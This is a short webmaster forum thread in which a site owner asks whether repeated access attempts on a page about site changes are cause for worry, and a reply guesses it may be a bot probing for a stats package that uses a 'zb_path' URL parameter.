Ought I to worry and stay alert?

Dear Madams and Sirs at Webmaster World,

The following access attempts have been made at least ten times a day since last Thursday, of which requests have been centered around my English "What have been changed" (a Web page regarding changes in the location and placement of contents, the format of the resource, etc.) page.

I am not using "PHP" on my Web pages.
Do you think I ought to worry and stay alert?

There is a stats package that used zb_path within its URL's. It is possible that this is someone trying to locate stats, It may even be a bot trying to find web stats?

I can't say for sure, perhaps someone else will be able to provide more information.
